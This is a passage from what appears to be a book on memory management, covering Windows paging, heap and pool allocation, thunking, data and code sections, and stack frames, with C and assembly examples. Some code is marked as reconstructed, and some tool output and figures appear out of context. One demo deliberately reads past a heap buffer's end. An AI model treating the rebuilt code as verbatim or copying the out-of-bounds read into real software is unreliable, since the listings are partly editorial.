PAGE_NOACCESS Page region cannot be accessed
PAGE_NOCACHE Page region cannot be placed in the cache
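The following sketch shows one of these specifiers in action. Reading the page succeeds; uncommenting the write produces an access violation:

#include <windows.h>
#include <stdio.h>

void main()
{
    char *ptr;

    /* commit a read-only page */
    ptr = (char*)VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READONLY);
    if (ptr == NULL) { printf("no memory\n"); return; }

    printf("first byte = %d\n", ptr[0]);   /* reading is permitted */
    /* ptr[0] = 'a';   <-- writing raises an access violation */

    VirtualFree(ptr, 0, MEM_RELEASE);
    return;
}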
Demand Paging
Windows uses the Present (P) flag in page table entries to support
demand paging. Windows also adds a twist to this mechanism by
loading a cluster of pages in an effort to reduce the number of page
faults that it handles. The size of the page cluster loaded depends on
the amount of physical memory available. Given that most machines
have at least 32MB of DRAM, page clusters will be either four or
eight pages in size.
As I mentioned earlier, disk I/O is an extremely expensive opera-
tion and should be avoided by whatever means necessary. Each page
fault translates into a read from the disk. Clustering is a clever way
to save execution time. It is like shopping at a wholesale food dis-
tributor to save trips to the grocery store.
When there are plenty of unoccupied page frames in physical
memory, the operating system will load disk-bound pages into these
frames when they are requested. However, things get a little more
complicated when there are no available page frames to spare. In
110 Chapter 2
this case, the operating system has to make a policy decision and
decide which pages in physical memory will be removed to make
way for the requested pages that are loaded from disk storage. How
does the operating system decide which pages to write to disk in
order to produce the necessary free space?
Once again, we are faced with a scenario that is like a game of
musical chairs.
There are a few standard algorithms, including first in, first out
(FIFO) and least recently used (LRU). The FIFO algorithm moves
pages to disk that have been in memory the longest. The LRU algo-
rithm is slightly more involved. The LRU algorithm takes into
account how recently each page in physical memory has been used.
Those pages that have gone the longest without being accessed are
written to disk.
Which algorithm does Windows use? This depends on the num-
ber of processors that Windows can access on the motherboard. If
Windows is running on top of a single processor, a variation of the
LRU algorithm is utilized. If Windows has multiple processors at its
disposal, it uses the FIFO algorithm. In both cases, the algorithms
are applied in the context of working sets. If a page is requested that
has been written to disk, Windows will look at the working set that
the page belongs to in order to determine which members of the
working set should be swapped to disk so that the requested page
can be loaded into memory.
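To get a feel for the FIFO policy, here is a small user mode simulation (my own construction, not Windows code) that counts the page faults generated by a reference string when only three page frames are available:

#include <stdio.h>

#define NFRAMES 3

void main()
{
    int frames[NFRAMES] = { -1, -1, -1 };
    int refs[] = { 1, 2, 3, 4, 1, 2, 5, 1, 2, 3, 4, 5 };
    int nrefs = sizeof(refs)/sizeof(refs[0]);
    int oldest = 0;
    int faults = 0;
    int i, j, resident;

    for (i = 0; i < nrefs; i++)
    {
        resident = 0;
        for (j = 0; j < NFRAMES; j++)
        {
            if (frames[j] == refs[i]) { resident = 1; break; }
        }
        if (!resident)                      /* page fault */
        {
            frames[oldest] = refs[i];       /* evict the page loaded earliest */
            oldest = (oldest + 1) % NFRAMES;
            faults++;
        }
    }
    printf("page faults: %d\n", faults);
    return;
}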
Memory Allocation
When the kernel allocates physical memory for a process, it sets up
the allocated memory so that the first address (i.e., the lowest
address) is a multiple of 64KB. In other words, processes are
aligned in physical memory on a 64KB boundary. The size of the
address space reserved for a process is a multiple of the native pro-
cessor’s page size. On a Pentium, an application would be given a
plot of real estate in physical memory that is a multiple of 4KB. The
Pentium does provide facilities for larger page sizes (i.e., 4MB), but
everyone in their right mind sticks to 4KB page sizes (MMURTL,
Linux, Windows, etc.).
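Both of these granularities can be confirmed at run time. The following sketch queries them through the Win32 GetSystemInfo() call:

#include<windows.h>
#include<stdio.h>

void main()
{
    SYSTEM_INFO info;
    GetSystemInfo(&info);
    printf("page size =%lu\n",info.dwPageSize);
    printf("allocation granularity =%lu\n",info.dwAllocationGranularity);
    return;
}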
One of the fringe benefits of being a user process is that each
task is constructed with its own heap. Figure 2.22 displays one of
the possible memory layouts for a user process. The stack grows
down from the highest address, and the heap grows up toward the
stack.
Figure 2.22
#include<windows.h>
#include<stdio.h>
#include<stdlib.h>

void main()
{
    HANDLE hHeap;
    unsigned char *buffer;

    hHeap = GetProcessHeap();
    if(hHeap==NULL){ printf("No heap!\n"); exit(1); }

    /* 512 bytes requested; HEAP_ZERO_MEMORY zeroes them all */
    buffer = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,512);
    if(buffer==NULL){ printf("No heap space!\n"); exit(1); }

    /* buffer[511] is the last byte we own; buffer[512] lies past
       the end of the block, so its value (0xCA here) is heap
       bookkeeping data (these printing lines are reconstructed
       to match the output below) */
    printf("buffer[511]=%X, buffer has been zeroed\n",buffer[511]);
    printf("buffer[512]=%X\n",buffer[512]);

    if(HeapFree(hHeap,HEAP_NO_SERIALIZE,buffer))
    {
        printf("have returned memory to the collective\n");
    }
    return;
}

When this program is run, you will see:

buffer[511]=0, buffer has been zeroed
buffer[512]=CA
have returned memory to the collective
Hit Rate = 0% Hit Rate = 0%
...
Total NonPaged currently allocated for above lists = 2536
Total NonPaged potential for above lists = 4048
Total Paged currently allocated for above lists = 0
Total Paged potential for above lists = 544
kd>
If you look back at Figure 2.19, you will see that the operating sys-
tem reserves significant portions of memory for the paged and
locked memory pools/heaps. These pools vary in size, but the maxi-
mum pool sizes are hard coded in the kernel’s source code. The
paged memory pool, whose storage can be written to disk, can be at
most approximately 492MB in size. The non-paged memory pool,
which is used by device drivers that require resident memory, can
be at most 256MB in size.
The kernel’s use of its memory pools can be examined with the
Poolmon.exe program that ships with the Windows Support Tools
package. But before you do, you will need to run gflags.exe
(which also ships with the support tools) and enable pool tagging.
Pool tagging allows the kernel to assign a tag to each type of data
structure being allocated and freed within the kernel. Statistics can
then be gathered for particular data structures. The Poolmon.exe
program tracks the individual allocations that are made from the
paged and non-paged memory pools. The output is character-based,
as shown in Figure 2.23.
An explanation of the columns appearing in Figure 2.23 is pro-
vided in Table 2.9.
Table 2.9
Column      Meaning
Tag         Identifies a particular type of data structure
Type        Source of memory: paged or non-paged pool
Allocs      Number of data structure allocations made
Frees       Number of data structure releases made
Diff        Allocs minus Frees
Bytes       Total number of bytes currently used by this type of data structure
Per Alloc   Number of bytes used by a single data structure of this type
Figure 2.23
Memory Usage
Memory usage can be measured on a system-wide basis or on a pro-
cess-by-process basis. System administrators tend to be concerned
with the former and developers tend to be concerned with the
latter.
The following three mechanisms can be used to track memory
usage on a system-wide basis:
- Task Manager: Performance pane
- Win32 API
- Pmon.exe
There are also a couple of tools that can be used to measure the
memory used by a process:
- Task Manager: Process pane
- Pviewer.exe
The Task Manager can be invoked by pressing the Ctrl+Alt+Del
keys simultaneously. This combination of keys is known as the
three-finger salute.
Figure 2.24
The Mem Usage column in the Process pane specifies the physical
memory used by a process. The Kernel Memory section on the Per-
formance pane specifies the size of the paged and non-paged kernel
memory pools.
The Win32 API has a function called GlobalMemoryStatus()
that will return the current memory usage by the system. An exam-
ple of its usage is offered in the following short program.
#include<windows.h>
#include<stdio.h>
void main()
{
MEMORYSTATUS mstatus;
GlobalMemoryStatus(&mstatus);
printf("percent of memory in use =%lu\n",
mstatus.dwMemoryLoad);
printf("bytes of physical memory =%lu\n",
mstatus.dwTotalPhys);
printf("free physical memory bytes =%lu\n",
mstatus.dwAvailPhys);
printf("max. bytes in paging file =%lu\n",
mstatus.dwTotalPageFile);
printf("free bytes in paging file=%lu\n",
mstatus.dwAvailPageFile);
printf("total bytes in user space =%lu\n",
mstatus.dwTotalVirtual);
printf("free user bytes =%lu\n",mstatus.dwAvailVirtual);
return;
}
Pmon.exe and Pviewer.exe are both tools that are bundled with
the Windows Support Tools package. Pmon.exe offers a snapshot
of the operating system and all of its processes. The output is
dynamically updated so that the statistics provided reflect the actual
state of your computer (see Figure 2.25).
Figure 2.25
Figure 2.26
I have been told that paging on Windows imposes an average
execution time penalty of 10%.
NOTE The paging penalty can actually be even greater than 10%
given that most programs are currently larger than 88KB (the amount
of cached page relocations afforded by the look-aside cache in the
paging unit). Take a program that calls many functions. Each time you
access a function, there is a high probability that it will not be in the
cache. This really drags out execution time. The only short-term solu-
tion that I can think of is to inline code with macros.
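By inlining with macros, I mean something like the following sketch, where the preprocessor expands the macro in place so that no CALL/RET pair (and no potential cache miss at the call target) is incurred:

#include<stdio.h>

/* the function version pays for a CALL/RET on every use */
int square(int x){ return x*x; }

/* the macro version is expanded in place by the preprocessor */
#define SQUARE(x) ((x)*(x))

void main()
{
    printf("%d %d\n",square(5),SQUARE(5));
    return;
}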
Figure 2.27
NOTE For those of you who were not on the scene in the early
1990s, Win32s was a special extension package that allowed 32-bit
applications to run on Windows 3.1 and Windows 3.11. It was often
bundled with development tools. I installed Win32s on my 80486 back
in 1995 as an add-on to the Borland 4.5 C++ compiler.
Universal thunking is of little use, seeing as how Windows 3.1 is, for
all intents and purposes, an extinct operating system.
Generic thunking is facilitated entirely by an API. Win32 func-
tions like LoadLibraryEx32W(), CallProc32W(), and
FreeLibrary32W() declared in WOWNT16.H allow 16-bit code to
load and invoke a 32-bit Win32 DLL. Because this mechanism is
API driven, most of the internal operation is hidden from view.
Flat thunking, however, uses a mechanism that is open to inspec-
tion, so dissecting this mechanism may offer some sort of insight.
Implementing flat thunking is a procedure that has five steps:
1. Write a thunk script.
2. Compile the thunk script with the thunk.exe compiler to
produce an .ASM file.
3. Assemble the generated .ASM file twice (to create a 16-bit and
a 32-bit .OBJ file).
4. Create a 16-bit DLL and link it with the 16-bit .OBJ file.
5. Create a 32-bit DLL and link it with the 32-bit .OBJ file.
The really interesting piece in this puzzle is the assembly code file
that the thunk compiler generates. It is this assembly code that
allows the 16-bit and 32-bit DLLs to interact.
NOTE For those of you who have never written a DLL, I included the
source code to a 32-bit DLL called dll32.c and a small program that
uses it, called usedll32.c, in the downloadable files (www.wordware.com/memory). Reading this code should give you what you need
to know.
The thunk script is just a text file that spells out the type signatures
of the functions that the 16- and 32-bit DLLs wish to expose to
each other. Consider the following thunk script, called script.thk.
The first line is a directive that enables direct 32-bit-to-16-bit
mapping; the declaration of function16() that follows it is a sketch
(reconstructed to agree with the assembly below), using the C-style
declaration syntax that thunk scripts employ:

enablemapdirect3216 = true;

typedef char *LPSTR;
void function16(LPSTR cptr, int n);
The assembly code in script.asm, which the 32-bit DLL will use
to call the 16-bit DLL function (i.e., function16()), looks like
this:
; dword ptr [ebp+8]: cptr
; dword ptr [ebp+12]: n
;
public IIfunction16@8
IIfunction16@8:
push ebp
mov ebp,esp
push ecx
sub esp,60
call SMapLS_IP_EBP_8
push eax
push word ptr [ebp+12] ;n: dword->word
call dword ptr [pfnQT_Thunk_script]
shl eax,16
shrd eax,edx,16
call SUnMapLS_IP_EBP_8
leave
retn 8
You can tell that this assembly code must be called by the 32-bit
DLL because the instructions use the extended registers. For
example, EBP is used as a frame pointer instead of just BP, and ESP
is used to point to the stack instead of just SP.
Keep in mind that the 16-bit DLL is native to 16-bit Windows. A
16-bit DLL does not run in real mode. It runs in a variation of pro-
tected mode.
From this assembly code, we can glean a few things. The two func-
tion arguments, cptr and n, are both 4 bytes in size and have
already been pushed onto the stack. The address of the character
array is located at [ebp+8], and the length argument (i.e., n) is
located at [ebp+12].
C:\DevStudio\VC\lib>dumpbin /linkermember thunk32.lib | more
As you can see, Microsoft again has hidden the fine print away in
the THUNK32.DLL library. I should have known better. If you are
interested in taking the next step, you will need to crank up a
disassembler and start reverse engineering THUNK32.DLL, should
you choose to accept this mission.
Closing Thoughts
Looking at the previous three protected mode operating systems
(MMURTL, Linux, and Windows), you should notice a trend. Seg-
mentation-based protection is not utilized to its full potential in any
of the case studies. I suspect that this is because of the way that vir-
tual memory works on Intel machines. The Pentium’s paging
facilities, in addition to supporting memory expansion via disk stor-
age, also provide a degree of segmentation functionality. In fact, not
only does Intel's paging hardware offer the same sort of protection
that segmentation does, but it does so at a much finer level of
granularity: access policies can be instituted on individual 4KB pages.
If you think about it, segmentation and paging both serve to break
up a region of memory into smaller parts. Paging just partitions
memory into smaller chunks. So, in a sense, investing in an elabo-
rate segmentation scheme via GDTs and LDTs is somewhat of a
wasted effort when the same type of services can be built on an
existing service that is already being used for something else.
The trade-off to relying heavily on paging is that it only permits a
two-ring privilege model. This is a far cry from the four-ring privi-
lege scheme that segmentation hardware supports. Page directory
and page table entries have only a single bit to specify privilege.
This leaves us with a pretty limited user/supervisor implementation
of access privileges. Paging also requires more memory within the
kernel itself because the data structures that track pages of data are
more numerous. Most operating systems give each process its own
page directory, which necessarily implies a handful of page tables
and their entries. A pure segmentation scheme could potentially
only require a single entry in the GDT to delimit and manage an
application in memory.
References
Books and Articles
Aleph One. “Smashing the Stack for Fun and Profit.” Phrack, Issue
49.
This is the groundbreaking article that put buffer overflow
attacks on the map.
Barnaby, Jack. “Win32 Buffer Overflows: Location, Exploitation, and
Prevention.” Phrack, Issue 55.
Bovet, D. and M. Cesati. Understanding the Linux Kernel: From I/O
Ports to Process Management. 2002, O’Reilly & Associates, ISBN:
0596000022.
These authors do an exceptional job of presenting a conceptual
view of how the Linux kernel operates. Generally this book
should be read before you tackle Maxwell’s.
Burgess, Richard. MMURTL V1.0. 2000, Sensory Publishing, Inc.,
ISBN: 1588530000.
There were some people in the computer subculture that sus-
pected that Richard’s book had been suppressed by the powers
that be. Thankfully, they were wrong. MMURTL is back and in
print. Burgess does a particularly nice job of explaining the hard-
ware interface.
Cesare, Silvio. “Runtime Kernel Kmem Patching.” 1998,
http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt.
This is the canonical article on kernel patching. Almost every
article on Linux kernel patching can be traced to this article in
one way or another.
Chebotko, Kalatchin, Kiselev, and Podvoisky. Assembly Language
Master Class. 1994, Wrox Press Inc., ISBN: 1874416346.
This book details a functional DPMI server for DOS.
[email protected]. “Abuse of the Linux Kernel for Fun and
Profit.” Phrack, Issue 50.
This article describes the steps needed to hijack a user-TTY
via LKMs.
Hatch, B., J. Lee, and G. Kurtz. Hacking Linux Exposed. 2001,
McGraw-Hill, ISBN: 0072127732.
Hoglund, Greg. “A *REAL* NT Rootkit: Patching the NT Kernel.”
Phrack, Issue 55.
Web Sites
http://www.cs.vu.nl/~ast/minix.html
(the home page for MINIX)
http://www.delorie.com/djgpp
DJGPP is a DOS port of GCC. This distribution offers a
DPMI host called cwsdpmi.exe.
http://www.dunfield.com/downloads.htm
The MICRO-C compiler can be obtained from this site.
http://www.kernel.org
This site offers the most recent Linux kernel source code.
http://www.linux.org
This is one of the more popular Linux portals.
http://www.microsoft.com/
Microsoft provides a number of tool kits that can be down-
loaded for free.
http://www.phrack.com
Before there was hacking, there was phone phreaking. This
e-zine came into being when guys like John Draper were explor-
ing the telecom systems. Phrack is one of the oldest and most
respected underground zines in distribution. I found more than a
few interesting articles at this site.
http://www.securityfocus.com
This is an excellent site for getting information on recent soft-
ware exploits. Bugtraq is particularly useful.
http://standards.ieee.org
If you have a couple hundred dollars to spare, you can pur-
chase the POSIX specification at this site.
126 Chapter 2
http://www.tenberry.com/web/dpmi/toc.htm
The DPMI spec is available at this web site, as is the
renowned DOS/4G DOS extender.
http://www.vci.com/products/pharlap.asp
The Phar Lap corporate name is still alive. Believe it or not,
they are still selling a DOS extender.
Chapter 3
High-Level Services
Figure 3.1
Compiler-Based Allocation
User applications typically have their address space divided into
four types of regions:
- Code section
- Data section
- Stack
- Heap
An application may have more than one section of a particular type
(see Figure 3.2). For example, an application may have multiple
code sections and stacks.
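A quick way to get a feel for this partitioning is to print an address from each type of region. The following throwaway program (a sketch; the exact values will vary with the platform and compiler) does just that:

#include<stdio.h>
#include<stdlib.h>

int globalvar;                  /* data section */

void main()                     /* code section */
{
    int localvar;               /* stack */
    char *heapvar = malloc(16); /* heap */

    printf("code  =%p\n",(void*)main);
    printf("data  =%p\n",(void*)&globalvar);
    printf("stack =%p\n",(void*)&localvar);
    printf("heap  =%p\n",(void*)heapvar);
    free(heapvar);
    return;
}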
Figure 3.2
Figure 3.3
mycode SEGMENT USE16                   ;segment setup (reconstructed)
ASSUME CS:mycode,DS:mycode,SS:mycode,ES:mycode
ORG 100H

;code region----------------------------------
entry:
PUSH DS
MOV AH,0H
PUSH AX
MOV [oldstack],SP
MOV SP,OFFSET stktop

MOV AX,OFFSET message                  ;print the message (this call
PUSH AX                                ;sequence is reconstructed to
CALL printStr                          ;match the output shown below)
POP AX

MOV SP,[oldstack]
RETF

;data region----------------------------------
oldstack DW ?
message DB 'the hot side stays hot--the cool side stays cool$'

;stack region---------------------------------
stkbody DB 31 dup ('01')
stktop DB 01H

;code region----------------------------------
printStr:
PUSH BP
MOV BP,SP
MOV AH,09H
MOV DX,[BP+4]
INT 21H
POP BP
RET

mycode ENDS
END entry
Here is the build command with MASM:

C:\MASM\SRC> ML /AT smallCom.asm

When you run this application, the following message is printed
to the screen:

C:\MASM\SRC>smallCom
the hot side stays hot--the cool side stays cool
As you can see, I have placed data, not to mention an entire
stack, dead in the middle of executable code. There are really very
few rules in the case of a .COM binary. Most current executable
formats, like the ELF file format or the PE file format, have
stricter, more established rules with regard to program section
arrangement.
QUESTION
What does all of this memory partitioning have to do with
development tools?
ANSWER
A compiler is a development tool that acts as a translator. It
consumes human-readable source code, moves the source
through its compound digestive tract, and then emits native
machine instructions (or some other type of bytecode). As it
translates, the compiler decides which section of the executable
each part of a program will occupy.
Data Section
The data section of an application traditionally supplies what is
known as static memory. As I mentioned earlier, static memory
regions are fixed in size and exist for the duration of an application’s
life span.
Given these two characteristics, most compilers will construct
data sections to serve as storage for global data. For example, con-
sider the following C program:
#include<string.h>

struct employee
{
    char firstname[32];
    char lastname[32];
    unsigned char age;
    unsigned int salary;
};

/* global variables; the declarations and initial values are
   reconstructed from the _DATA listing that follows */
struct employee architect = {"Gil","Bates",45,100000};
struct employee ceo = {"Reed","Almer",42,95000};
struct employee drone;

void main()
{
    strcpy(drone.firstname,"bill");
    strcpy(drone.lastname,"blunden");
    drone.age=35;
    drone.salary=(int)(3.5);
    return;
}
If we look at a listing file, it is clear that the global variables above
have been isolated in their own reserved program section called
_DATA. This section will have a fixed size and exist from the time
the program starts until the time that it exits.
.386P
.model FLAT
PUBLIC _architect
PUBLIC _ceo
_DATA SEGMENT
COMM _drone:BYTE:048H
_architect DB 'Gil', 00H
ORG $+28
DB 'Bates', 00H
ORG $+26
DB 02dH
ORG $+3
DD 0186a0H
_ceo DB 'Reed', 00H
ORG $+27
DB 'Almer', 00H
ORG $+26
DB 02aH
ORG $+3
DD 017318H
_DATA ENDS
PUBLIC _main
EXTRN _strcpy:NEAR
_DATA SEGMENT
$SG117 DB 'bill', 00H
ORG $+3
$SG118 DB 'blunden', 00H
_DATA ENDS
_TEXT SEGMENT
_main PROC NEAR
; 16 : {
push ebp
mov ebp, esp
; 17 : strcpy(drone.firstname,"bill");
; 18 : strcpy(drone.lastname,"blunden");
; 19 : drone.age=35;
; 21 : return;
; 22 : }
pop ebp
ret 0
_main ENDP
_TEXT ENDS
END
The data section has a long and venerable history as the second old-
est type of application memory section. In the old days, programs
were just code and a fixed clump of static storage. The sysop was
the only person with a console, punch cards were considered
high-tech, and a top-of-the-line Dietzgen-Tyler Multilog slide rule
with enamel finish cost $35.
Code Section
At the end of the day, an application’s various sections are just bytes
in memory. So in some special cases, you can get away with using a
code section for data storage. In other words, it is possible to turn a
code section into a data section. The magic rule to keep in mind is:
It is data as long as you don’t execute it. Here is an example:
/* --codedata.c-- */
#include<stdio.h>

void code()
{
    /*
    in a 32-bit code segment, each MOV AX,0x07 below is
    encoded in 4 bytes as 0x66 0xb8 0x07 0x00 (a 16-bit
    build drops the 0x66 prefix, leaving 3 bytes each)
    */
    _asm MOV AX,0x07
    _asm MOV AX,0x07
    _asm MOV AX,0x07
    _asm MOV AX,0x07

    /* 16 bytes of instructions in a 32-bit build */
    return;
}
void main()
{
char *cptr;
short reg;
code();
_asm MOV reg,AX
printf("reg=%d\n",reg);
cptr = (char*)code;
cptr[0]='d'; cptr[1]='a';cptr[2]='t';cptr[3]='a';
cptr[4]=(char)0;
printf("cptr[]=%s\n",cptr);
return;
}
This can be built as a 16-bit DOS app with Turbo C++.
C:\TCC\codeData>TCC -ms codedata.c
Figure 3.4
Stack
A stack is a sequence of bytes in memory that act like a
first-in-last-out (FILO) data structure. Computer stacks typically
“grow down.” Each stack has a stack pointer (i.e., SP in Figure 3.5)
that stores the lowest address of the last item allocated on the
stack. When a new item is added to the stack, the stack pointer is
decremented to point to that item’s first byte.
Figure 3.5
Figure 3.6
Adding values to and subtracting values from the stack pointer
does effectively change where SP
points, and this is a very fast way to allocate and free large amounts
of storage on the stack. However, transferring data to and from the
stack must be done manually. This is illustrated in Figure 3.7.
Figure 3.7
The stack pointer always determines where the next chunk of
allocated memory will start, regardless of how big or small the
data item to be allocated is.
The stack, though it might seem simple, is an extremely power-
ful concept when applied correctly. Stacks are used to implement
high-level features like recursion and variable scope. Some garbage
collectors use them as an alternative to a heap for more efficient
allocation.
Activation Records
If you wanted to, you could use registers to pass parameter informa-
tion to a function. However, using registers to pass parameters does
not support recursion. Using the stack is a more flexible and power-
ful technique. Managing the stack to facilitate a function call is the
responsibility of both the procedure that is invoking the function
and the function being invoked. Both entities must work together in
order to pass information back and forth on the stack. I will start
with the responsibilities that belong to the invoking function.
The following steps can be used to invoke a procedure and pass it
arguments:
1. Push the current function’s state onto the stack.
2. Push the return value onto the stack.
3. Push function arguments onto the stack.
4. Push the return address onto the stack.
5. Jump to the location of the procedure.
Using Intel’s CALL instruction will typically take care of the last two
steps automatically. The function being invoked must also take a few
steps to ensure that it can access the parameters passed to it and
create local storage:
1. Push EBP on to the stack (to save its value).
2. Copy the current ESP value into EBP.
3. Decrement ESP to allocate local storage.
4. Execute the function’s instructions.
The code that performs these four steps is known as the invoked
function’s prologue.
The result of all this stack manipulation is that we end up with a
stack arrangement similar to that displayed in Figure 3.8.
The region of the stack used to store a function’s parameters and
local storage is referred to as the activation record because every
time a procedure is activated (i.e., invoked), this information must
be specified. An activation record is also known as a stack frame.
High-Level Services 139
Figure 3.8
Chapter 3
NOTE On Intel machines, the EBP register is pushed on the stack so
that it can serve as a reference point. EBP is known as the stack frame
pointer, and it is used so that elements in the activation record can be
referenced via indirect addressing (i.e., MOV AX,[EBP+5]).
When the function has done its thing and is ready to return, it must
perform the following stack maintenance steps:
1. Reclaim local storage.
2. Pop EBP off the stack.
3. Pop the return address off the stack.
4. Jump to the return address.
The Intel RET instruction will usually take care of the last two
steps.
The code that performs the previous four steps is known as the
invoked function’s epilogue.
Once the invoked function has returned, the invoking function
will need to take the following steps to get its hands on the return
value and clean up the stack:
1. Pop the function arguments off the stack.
2. Pop the return value off the stack.
3. Pop the saved program state off the stack.
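Putting the previous step lists together, the stack traffic for a single call looks something like the following sketch (Intel assembly; it assumes the caller cleans up the arguments and that the return value travels back in EAX rather than through a stack slot, as most compilers arrange):

;the caller's side of the contract
PUSH 5              ;push the argument
CALL func           ;pushes the return address and jumps
ADD ESP,4           ;pop the argument once the call returns

;the invoked function
func:
PUSH EBP            ;prologue: save the old stack frame pointer
MOV EBP,ESP         ;establish the new stack frame
SUB ESP,8           ;allocate local storage

;...the function's instructions...

MOV ESP,EBP         ;epilogue: reclaim local storage
POP EBP             ;restore the old stack frame pointer
RET                 ;pop the return address and jump to it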
As an example, consider a global array and a sigma() function that
sums the array's elements. The sigma() definition below is
reconstructed from the source lines echoed in the listing that
follows:

char array[] = {1,2,3,4,5};

int sigma(char *cptr,int n)
{
    int i;
    int sum;

    sum = 0;
    for(i=0;i<n;i++){ sum = sum + cptr[i]; }
    return(sum);
}

void main()
{
    int retval;
    retval = sigma(array,5);
    return;
}
If we look at a listing file, we can see how activation records are uti-
lized in practice:
.386P
.model FLAT
PUBLIC _array
_DATA SEGMENT
_array DB 01H
DB 02H
DB 03H
DB 04H
DB 05H
_DATA ENDS
PUBLIC _sigma
_TEXT SEGMENT
_cptr$ = 8
_n$ = 12
_i$ = -8
_sum$ = -4
_sigma PROC NEAR
; 7 : {
push ebp
mov ebp, esp
sub esp, 8
; 8 : int i;
; 9 : int sum;
; 10 :
; 11 : sum= 0;
; 12 : for(i=0;i<n;i++){ sum = sum+ cptr[i]; }
; 13 : return(sum);
; 14 : }
_TEXT ENDS
PUBLIC _main
_TEXT SEGMENT
_retval$ = -4
_main PROC NEAR
; 17 : {
push ebp
mov ebp, esp
push ecx
; 18 : int retval;
; 19 :
; 20 : retval = sigma(array,5);
push 5
push OFFSET FLAT:_array
call _sigma
add esp, 8
and eax, 65535 ; 0000ffffH
mov DWORD PTR _retval$[ebp], eax
; 21 :
; 22 : //printf("retval=%d\n",retval);
; 23 : return;
; 24 : }
push 5
push OFFSET FLAT:_array
call _sigma
The invoking function pushes on the arguments. The CALL instruc-
tion automatically pushes a return address onto the stack. What
about the return value? As it turns out, the compiler is smart
enough to realize that recursion does not exist and uses the EAX
register to pass a return value back to main().
Figure 3.9
Once sigma() has calculated its sum, it places the return value in
EAX and cleans out the local storage. The RET instruction automati-
cally pops the return address off the stack.
; 13 : return(sum);
; 14 : }
Scope
The scope of a program element (a variable declaration, a function,
etc.) determines both the visibility and, potentially, the life span of
the element. When a program element is visible, it can be accessed
and manipulated. The life span of a program element determines
when the element is created and destroyed.
The one caveat to this rule is for program elements that have
their storage space allocated off the heap, dynamically, during exe-
cution. In this case, scope only defines the visibility of the program
element. The element will exist until it is reclaimed, which may or
may not be related to the scope of the element.
To explore the meaning of scope, let us examine how scope rules
apply to variables in the C programming language. Scope rules in C
are implemented through the use of code blocks. A block of code is a
region of source code that lies between a pair of brackets (i.e.,
between a “{” and a “}”). A function definition is an example of a
block of code.
void myfunction()
{
    /* block of code */
    return;
}
In fact, functions are actually at the top of the block hierarchy in C.
Functions may contain other blocks of code, as long as the blocks of
code are not function definitions (which is to say that function defi-
nitions cannot be nested in C). For example, the following function
definition contains a few sub-blocks:
void myfunction()
{
int i;
for(i=0;i<10;i++)
{
if((i%2)==0)
{
printf("%d is even\n",i);
}
}
{
int j=10;
printf("j=%d\n",j);
}
return;
}
From the previous function definition, we can see that blocks of
code may be nested. In addition, although blocks of code are usually
associated with program control statements, it is possible for blocks
of code to exist independently of a program control statement. For
example, the code that prints out the value of “j” is a stand-alone
block.
Even though functions may contain other blocks of code, blocks
of code (that are not function definitions) cannot independently exist
outside of a function definition. For example, you would never see:
void myfunction1()
{
    /* block of code */
    return;
}

int i;
for(i=0;i<10;i++){ printf("%d\n",i); }

void myfunction2()
{
    /* block of code */
    return;
}
An ANSI C compiler processing the previous code would protest
that the for loop does not belong to a function and would refuse to
compile the code.
The scope of variables in C is block based. A variable declared
inside of a block of code is known as a local variable. A local variable
is visible in the block in which it is declared and all the sub-blocks
within that block. A variable cannot be accessed outside of the block
in which it was declared. For example, the following snippet of C
code is completely legal:
void main()
{
int i;
for(i=0;i<10;i++)
{
int j=i*i;
printf("i=%d, i^2=%d\n",i,j);
}
return;
}
The following snippet of C code, however, is illegal:
void main()
{
int i;
for(i=0;i<10;i++)
{
int j=i*i;
printf("i=%d, i^2=%d\n",i,j);
}
printf("i=%d, i^2=%d\n",i,j);
return;
}
In the first case, we are perfectly within the syntactical rules of C
when the variable “i” is accessed in a sub-block. In the second
case, however, if we try to access the variable “j” outside of its
declaring block, the compiler will emit an error. Naturally, there are
two special cases to this rule: global variables and the formal param-
eters of a function.
A global variable is a variable defined outside of any block of code.
As such, a global variable is visible throughout a program by every
section of code. Global variables also exist for the duration of a pro-
gram’s execution path.
Formal parameters are the variables specified in the prototype of
a function. They are the variables that receive the arguments
passed to a function when it is invoked. Formal parameters have
visibility and a life span that is limited to the body of the function
they belong to.
Two basic techniques exist with regard to managing scope within
the body of a procedure: the all-at-once approach and additional
stack frames.
One way to manage scope is to allocate storage for all of a func-
tion’s local variables in the prologue code. In other words, we use
the function’s activation record to provide storage for every local
variable defined inside of the function, regardless of where it is
used. To support this approach, a compiler will use its symbol table
to make sure that a local variable is not accessed outside of its
declaring block.
void main(int argc,char *argv[])
{
    /* the function header and these declarations are
       reconstructed from the assembly listing below */
    unsigned char arr1[20];
    unsigned long int i;

    arr1[0]='a';
    i=argc;
if(i<4)
{
unsigned char arr2[7];
unsigned long int j;
unsigned long int k;
arr2[0]='b';
j=5;
k=6;
}
else
{
unsigned char arr3[17];
arr3[0]='c';
}
}
By looking at its assembly code equivalent, we can see how storage
for all these variables was allocated:
.386P
.model FLAT
PUBLIC _main
_TEXT SEGMENT
_argc$ = 8
_arr1$ = -24
_i$ = -4
_arr2$31 = -40
_j$32 = -28
_k$33 = -32
_arr3$35 = -60
_main PROC NEAR
; Line 4
push ebp
mov ebp, esp
sub esp, 60 ; 0000003cH
; Line 8
mov BYTE PTR _arr1$[ebp], 97 ; 00000061H
; Line 9
mov eax, DWORD PTR _argc$[ebp]
Figure 3.10
NOTE In a way, stacks are really about storage life span. Visibility
restrictions follow naturally as a result of life span constraints. Recall
that stacks are good for situations in which you need to do, and then
undo, an operation. This makes them perfect for creating temporary
storage. The limited visibility is more of a side effect of the limited life
span. Once a variable has been popped off the stack, it is gone and
any reference to it can yield garbage.
Unlike a full-blown function, a code block only has local variables.
Table 3.1 presents a basic comparison of functions and code blocks.
Table 3.1
            Saved State   Return Value   Arguments   Return Address   Variables
Function    yes           yes            yes         yes              yes
Sub-block   yes           no             yes         no               yes
As you can see from the table, a code block has saved program state
information and local variables in its stack frame. Local variables
declared outside the block but accessed inside the block can be
treated as arguments. Figure 3.11 displays a comparison of the stack
frames used by a function and a code block.
Figure 3.11
QUESTION
What are the trade-offs between the all-at-once approach and
the additional stack frame approach?
ANSWER
The extra stack frame technique requires that stack manipula-
tion be performed every time a block is entered or exited. If a
section of code has a heavily nested set of blocks, this translates
into a lot of extra push and pop operations. This means the extra
stack frame tactic will create an executable that is larger and
slower because more instructions will need to be executed.
The downside of using the all-at-once tactic is that it requires a
lot of storage overhead. Space in the activation record
will be reserved even if a variable is not used. If a function has
